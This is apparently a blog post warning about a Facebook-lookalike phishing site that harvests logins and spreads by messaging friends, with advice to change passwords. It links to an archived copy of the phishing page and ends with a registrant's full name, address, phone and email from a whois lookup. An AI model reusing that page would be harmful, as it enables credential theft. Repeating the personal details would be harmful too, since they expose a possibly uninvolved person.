Facebook Phishing site: fbstarter.com
I got a Facebook mail from a friend today titled “Look at this!” with a link to fbstarter.com.
The site itself, looks just like FaceBook (even the code view and CSS – screenshot here) – but the site itself didn’t seem to offer much except for a login. I put in dummy information and was redirected to the real Facebook site with this message:
It’s good to know that Facebook is already on top of it.
When I asked my friend how he came to find / be infected with the exploit (my initial that was a rogue app) he replied: “Link from a friend on Facebook.” My guess is that the site logs in as you and send a message to all your friends to infect more people (he told me he looked through his sent mail and apparently it’s been sending emails out 15-16 at a time).
What’s interesting about this exploit is that there really isn’t any XSS or CSRF involved – Facebook didn’t do anything wrong – it’s just plain social engineering, a site dresses itself up to look like Facebook and asks you to log-in.
I went ahead and archived the fbstarter.com site as I’m sure it’ll be taken down soon:
http://insecureweb.com/files/fbstarter/ (doesn’t include images)
If you are infected – change all your passwords immediately. Although it’s unlikely the perpetrators can access your other sites many people use the same passwords or deviations of the same password for many sites. It would be in your best interest to change all your passwords regardless whether they’re the same or not (at the very least a clear conscious).
In addition, consider upgrading to Firefox 3 if you haven’t, which attempts to block web forgery attempts (after they are reported – see what happens when I try to visit fbaction.net a similar forgery site).
A whois on the owner of the domain shows our friends in Russia as usual:
Ad / Name Boris Soroka Adres Stavropolskaya str. d.18 kv.164 Moscow Moscow 109386 Tel +7.4957851102 Faks E-posta vy@seostudio.at Guncelleme / Updated